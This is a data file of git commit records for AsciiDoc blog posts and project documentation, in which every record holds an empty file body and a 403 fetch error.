{"commit":"9339206766282340f63c6959e75e07897e9453d2","subject":"Update 2015-10-04-Professor-IPTables.adoc","message":"Update 2015-10-04-Professor-IPTables.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-10-04-Professor-IPTables.adoc","new_file":"_posts\/2015-10-04-Professor-IPTables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"508ab241d8f497d04e37ee56e098b69d2d8310cb","subject":"Update 2016-11-07-Sunday-Night-Dream.adoc","message":"Update 2016-11-07-Sunday-Night-Dream.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Sunday-Night-Dream.adoc","new_file":"_posts\/2016-11-07-Sunday-Night-Dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0b1ebc80744062c431ff9ae433f540c0552fa2e7","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"9a757531c2bc7977892ac50692df32315bf777ea","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"627e6a3ecf1dee8fb9b4a9257f465b2de55f91ac","subject":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","message":"Update 2016-03-31-Un-poco-sobre-Linux.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_file":"_posts\/2016-03-31-Un-poco-sobre-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"1625a15b0ecdcdd5dede201b8531b8cfebd44cef","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"5d9e5606dc6c04e0c288da1f4d9934c5ad6e0c95","subject":"Update 2017-06-07-Stateless-Component.adoc","message":"Update 2017-06-07-Stateless-Component.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2017-06-07-Stateless-Component.adoc","new_file":"_posts\/2017-06-07-Stateless-Component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b23fe91b1cadabb799a10b73dd250b678e2da613","subject":"Update 2018-01-16-Command-Line-Heroes.adoc","message":"Update 2018-01-16-Command-Line-Heroes.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-01-16-Command-Line-Heroes.adoc","new_file":"_posts\/2018-01-16-Command-Line-Heroes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"fdaafd7bb721d0725028e624a395560ed22b5940","subject":"Update 2015-07-07-Netrunner.adoc","message":"Update 2015-07-07-Netrunner.adoc","repos":"nullbase\/nullbase.github.io,nullbase\/nullbase.github.io,nullbase\/nullbase.github.io","old_file":"_posts\/2015-07-07-Netrunner.adoc","new_file":"_posts\/2015-07-07-Netrunner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nullbase\/nullbase.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c663448093d91a7e3f511d8117bc1c79dfa4d38c","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f3b424e0c574364262f8c0b60e9d2b1516414de7","subject":"CAMEL-14478 - Create an AWS-KMS component based on SDK v2, added docs","message":"CAMEL-14478 - Create an AWS-KMS component based on SDK v2, added docs\n","repos":"gnodet\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,tdiesler\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,zregvart\/camel,nicolaferraro\/camel,tadayosi\/camel,pax95\/camel,zregvart\/camel,mcollovati\/camel,tdiesler\/camel,nikhilvibhav\/camel,mcollovati\/camel,adessaigne\/camel,ullgren\/camel,zregvart\/camel,cunningt\/camel,apache\/camel,christophd\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,apache\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,alvinkwekel\/camel,nicolaferraro\/camel,christophd\/camel,pmoerenhout\/camel,apache\/camel,gnodet\/camel,ullgren\/camel,cunningt\/camel,nikhilvibhav\/camel,DariusX\/camel,christophd\/camel,pmoerenhout\/camel,pmoerenhout\/camel,ullgren\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,tdiesler\/camel,gnodet\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,adessaigne\/camel,pmoerenhout\/camel,cunningt\/camel,DariusX\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,nicolaferraro\/camel,alvinkwekel\/camel,cunningt\/camel,pax95\/camel,DariusX\/camel,gnodet\/camel,cunningt\/camel,cunningt\/camel,zregvart\/camel,mcollovati\/camel,ullgren\/camel,apache\/camel,DariusX\/camel","old_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws2-kms-component.adoc","new_file":"components\/camel-aws2-kms\/src\/main\/docs\/aws2-kms-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
2015-04-29-GitHub-Pages.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-29-GitHub-Pages.adoc","new_file":"_posts\/2015-04-29-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe9e330b8f136699ed3874cde3b45e3bae6d9ef","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c161004876ddf95cfed2555dee4cc4a8bc3c9576","subject":"Delete the file at '_posts\/2016-02-16-All-Important-Context-Maps.adoc'","message":"Delete the file at '_posts\/2016-02-16-All-Important-Context-Maps.adoc'","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d624607d30060cd77caa0cbae8e9d81446f759e","subject":"y2b create post It Wakes You Up With Smell...","message":"y2b create post It Wakes You Up With Smell...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-13-It-Wakes-You-Up-With-Smell.adoc","new_file":"_posts\/2017-03-13-It-Wakes-You-Up-With-Smell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"922cadb27e4724c1df73399cad7cb9c962c6dc62","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd0cf039b57fb246b979b6e989b2131c79050cae","subject":"PLANNER-423 Switch from LaF Metal to Nimbus + move TangoColorFactory, SwingUtils and SwingUncaughtExceptionHandler","message":"PLANNER-423 Switch from LaF Metal to Nimbus + move TangoColorFactory, SwingUtils and 
SwingUncaughtExceptionHandler\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe6.4.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe6.4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"adb80c88890b4841e861f8964d69ae391d52015a","subject":"y2b create post Watch Dogs Limited Edition Unboxing \\u0026 Giveaway!","message":"y2b create post Watch Dogs Limited Edition Unboxing \\u0026 Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-05-22-Watch-Dogs-Limited-Edition-Unboxing-u0026-Giveaway.adoc","new_file":"_posts\/2014-05-22-Watch-Dogs-Limited-Edition-Unboxing-u0026-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b2b4bcd1a8f33c378f60e549d96309c288d9602","subject":"Update 2017-07-28-Storage-A-P-I-Persistent-Large-Storage-for-the-Web.adoc","message":"Update 2017-07-28-Storage-A-P-I-Persistent-Large-Storage-for-the-Web.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-07-28-Storage-A-P-I-Persistent-Large-Storage-for-the-Web.adoc","new_file":"_posts\/2017-07-28-Storage-A-P-I-Persistent-Large-Storage-for-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46fd33d6890f8f879e3194a8089452e6afbd9718","subject":"Keycloak custom image with Operator","message":"Keycloak custom image with 
Operator\n","repos":"raehalme\/keycloak,ahus1\/keycloak,stianst\/keycloak,abstractj\/keycloak,thomasdarimont\/keycloak,ahus1\/keycloak,srose\/keycloak,keycloak\/keycloak,mhajas\/keycloak,thomasdarimont\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,ahus1\/keycloak,reneploetz\/keycloak,jpkrohling\/keycloak,abstractj\/keycloak,raehalme\/keycloak,mhajas\/keycloak,ahus1\/keycloak,keycloak\/keycloak,raehalme\/keycloak,keycloak\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,stianst\/keycloak,reneploetz\/keycloak,reneploetz\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,raehalme\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,stianst\/keycloak,srose\/keycloak,raehalme\/keycloak,mhajas\/keycloak,thomasdarimont\/keycloak,jpkrohling\/keycloak,stianst\/keycloak,ahus1\/keycloak,srose\/keycloak,mhajas\/keycloak,abstractj\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,mhajas\/keycloak,srose\/keycloak,stianst\/keycloak,jpkrohling\/keycloak,reneploetz\/keycloak,keycloak\/keycloak,srose\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak","old_file":"docs\/guides\/src\/main\/operator\/customizing-keycloak.adoc","new_file":"docs\/guides\/src\/main\/operator\/customizing-keycloak.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4dd3f74e9fdab28c69def57a921f4a1052554068","subject":"Update 2015-09-22-Test.adoc","message":"Update 2015-09-22-Test.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-09-22-Test.adoc","new_file":"_posts\/2015-09-22-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0917afe17d7edef5dfd4717bf8103cca9952596f","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffcf6032f592e05805f5a3a000b380e205781ef2","subject":"adding graph gist","message":"adding graph gist\n","repos":"redapple\/sql2graph","old_file":"examples\/musicbrainz\/musicbrains_gist.adoc","new_file":"examples\/musicbrainz\/musicbrains_gist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redapple\/sql2graph.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6d898942fab6e78b811bf43779e2a4e33171328","subject":"y2b create post Unbox Next - PS3 Headset, Samsung 3D Kit, Catherine Deluxe Edition (PS3), PS3 Wireless Keypad","message":"y2b create post Unbox Next - PS3 Headset, Samsung 3D Kit, Catherine Deluxe Edition (PS3), PS3 Wireless 
Keypad","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-18-Unbox-Next--PS3-Headset-Samsung-3D-Kit-Catherine-Deluxe-Edition-PS3-PS3-Wireless-Keypad.adoc","new_file":"_posts\/2011-09-18-Unbox-Next--PS3-Headset-Samsung-3D-Kit-Catherine-Deluxe-Edition-PS3-PS3-Wireless-Keypad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"870818d42194b72013f2011dd9083a98e275ce4f","subject":"Update 2018-05-14-command64.adoc","message":"Update 2018-05-14-command64.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-14-command64.adoc","new_file":"_posts\/2018-05-14-command64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e94fb72da974ab550ecd16746f7704dd68879039","subject":"Add 2017-06-20-forge-3.7.1.final.asciidoc","message":"Add 2017-06-20-forge-3.7.1.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2017-06-20-forge-3.7.1.final.asciidoc","new_file":"news\/2017-06-20-forge-3.7.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"98f6bd1aa74d75d5711290e54d2c2d6044d620d3","subject":"Update 2016-12-08-My-Development-Environment-setup.adoc","message":"Update 2016-12-08-My-Development-Environment-setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6492dc784357db5b0383ae24bbf0957e046d84d6","subject":"y2b create post The iPhone 7 Plus Spider Edition","message":"y2b create post The iPhone 7 Plus Spider Edition","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-16-The-iPhone-7-Plus-Spider-Edition.adoc","new_file":"_posts\/2017-07-16-The-iPhone-7-Plus-Spider-Edition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b02bf2d955247681b2cb6dd9f7e76579d8ee3c4b","subject":"docs: fix documentation to build on CentOS\/Ubuntu\/SUSE.","message":"docs: fix documentation to build on CentOS\/Ubuntu\/SUSE.\n\nOn RHEL\/CentOS, Debian\/Ubuntu, and SUSE, OpenJDK is required to\nbuild Kudu with CMAKE_BUILD_TYPE=release.\n\nChange-Id: I7a7fcd8510c6ca465b7ba6d9fb39993ce24b29de\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8746\nTested-by: 
Kudu Jenkins\nReviewed-by: Dan Burkert <4ef91e292a55314d2653d35ff669a6bd939ce515@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d7df1436caa15bb4771b443e0d6a5751f6f1f29","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b424df2575b56053b5937080250be4659cbf300f","subject":"Delete the file at '_posts\/2017-03-03-Test-Collab.adoc'","message":"Delete the file at '_posts\/2017-03-03-Test-Collab.adoc'","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-03-03-Test-Collab.adoc","new_file":"_posts\/2017-03-03-Test-Collab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4616bb570d40d3a924112c14985867f3a543912d","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a86e73f383a974a8d887ca1d7d2729c62dfeb4b","subject":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","message":"Update 2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_file":"_posts\/2017-04-02-Confidence-CTF-Public-Key-Infrastructure-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76406ef1f078a8ca0c70f0f02e3a80c183991127","subject":"y2b create post iPhone 5s Unboxing (GOLD iPhone 5s Launch Day Unboxing)","message":"y2b create post iPhone 5s Unboxing (GOLD iPhone 5s Launch Day Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-20-iPhone-5s-Unboxing-GOLD-iPhone-5s-Launch-Day-Unboxing.adoc","new_file":"_posts\/2013-09-20-iPhone-5s-Unboxing-GOLD-iPhone-5s-Launch-Day-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e9c03aa83592e613270cfc5795f73c8b23ebfb8","subject":"Add AbstractAuthenticationProcessingFilter Docs","message":"Add AbstractAuthenticationProcessingFilter Docs\n\nCloses gh-8004\n","repos":"fhanik\/spring-security,fhanik\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,djechelon\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/abstract-authentication-processing-filter.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/abstract-authentication-processing-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80a591294ea622bd83855c98bfc347313146cb2d","subject":"Update 2015-11-06-Test.adoc","message":"Update 2015-11-06-Test.adoc","repos":"gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io,gajumaru4444\/gajumaru4444.github.io","old_file":"_posts\/2015-11-06-Test.adoc","new_file":"_posts\/2015-11-06-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gajumaru4444\/gajumaru4444.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"183d732d55300951b62f2d24b757f2f7b42a17b9","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"dfeeb1ab4745f5d38c4707649c5125ce52518907","subject":"Update 2016-02-04-Kubernetes-API-Management-importing-a-Camel-with-serious-Swagger.adoc","message":"Update 2016-02-04-Kubernetes-API-Management-importing-a-Camel-with-serious-Swagger.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-02-04-Kubernetes-API-Management-importing-a-Camel-with-serious-Swagger.adoc","new_file":"_posts\/2016-02-04-Kubernetes-API-Management-importing-a-Camel-with-serious-Swagger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5737e7c8ff8f10766807ac46b0d00b47f4fdb36","subject":"Update 2016-07-29-kanban.adoc","message":"Update 